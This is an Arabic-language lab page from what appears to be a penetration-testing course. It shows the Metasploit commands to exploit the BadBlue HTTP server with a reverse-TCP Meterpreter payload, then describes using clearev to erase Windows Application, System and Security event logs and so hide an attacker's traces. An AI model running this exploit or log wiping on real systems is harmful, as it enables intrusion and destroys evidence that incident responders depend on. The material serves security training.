search

🧪 المختبر العملي 25 : مسح سجلات أحداث Windows (Clearing Windows Event Logs Lab)

🎯 الهدف الأساسي: مسح سجلات أحداث Windows (Application, System, Security Event Logs) على النظام المستهدف بعد الحصول على جلسة Meterpreter، لإخفاء آثار وجود المهاجم .

🔧 الأدوات المستخدمة:

  • MSFconsole: واجهة Metasploit الرئيسية.

  • Exploit Module: أي وحدة استغلال تمنح جلسة Meterpreter (مثلاً: windows/http/badblue_passthru).

  • Meterpreter Payload: للحصول على تحكم كامل.

  • Meterpreter Command: clearev: لمسح سجلات الأحداث.

📜 خطوات التنفيذ:

hashtag
📊 مرحلة الاستغلال (Exploitation)

  1. 🚀 بدء تشغيل MSFconsole والحصول على جلسة Meterpreter:

    • ابدأ msfconsole:

      msfconsole -q

    • حدد عنوان IP للهدف.

    • 🔑 استخدام وحدة استغلال للحصول على Meterpreter (مثلاً Badblue HTTP Server):

      use exploit/windows/http/badblue_passthru
set RHOSTS [Target_IP_Address]
set LHOST [Your_Kali_IP_Address]
set LPORT 4444
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

    • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Meterpreter session 1 opened.

hashtag
📊 مرحلة ما بعد الاستغلال: مسح الآثار (Clearing Tracks)

  1. 💡 التحقق من سجلات الأحداث قبل المسح (اختياري):

    • إذا كان لديك وصول رسومي إلى جهاز الضحية، يمكنك فتح Event Viewer (عارض الأحداث) والتحقق من وجود سجلات الأحداث (خاصة سجلات الأمان).

    • من جلسة Meterpreter، يمكنك استخدام الأمر shell ثم eventvwr.exe لفتح عارض الأحداث.

  2. 🔑 مسح سجلات أحداث Windows باستخدام clearev:

    • مسح السجلات:

    • إذا نفذت هذا الأمر، ستقوم Meterpreter بمسح سجلات أحداث Application, System, و Security.

    • ستظهر رسالة تؤكد عدد السجلات التي تم مسحها لكل نوع (مثلاً: 56 records cleared from Application, 504 events cleared from System, 15899 records cleared from Security).

  3. ✅ التحقق من مسح سجلات الأحداث:

    • إذا كان لديك وصول رسومي إلى جهاز الضحية، افتح Event Viewer مرة أخرى.

    • انتقل إلى سجلات Application, System, و Security. يجب أن تجدها فارغة تقريبًا، مع وجود سجل واحد يشير إلى أن Log cleared (تم مسح السجل).

    • 🔗 ربط سلسلة الأدوات: هذا الإجراء يصعب على فرق الاستجابة للحوادث تتبع أنشطتك على النظام.

نقاط التحقق:

  • يجب الحصول على جلسة Meterpreter.

  • يجب أن يتم مسح سجلات أحداث Application, System, و Security بنجاح باستخدام clearev.

  • يجب أن تظهر سجلات الأحداث على النظام المستهدف (إذا تم التحقق منها) على أنها تم مسحها.

Previous🧪 المختبر العملي 24: تسجيل الملفات وضغطات المفاتيح في Windows (Windows – File and Keylogging LabNext🧪 المختبر العملي 26: التمحور (Pivoting Lab)

Last updated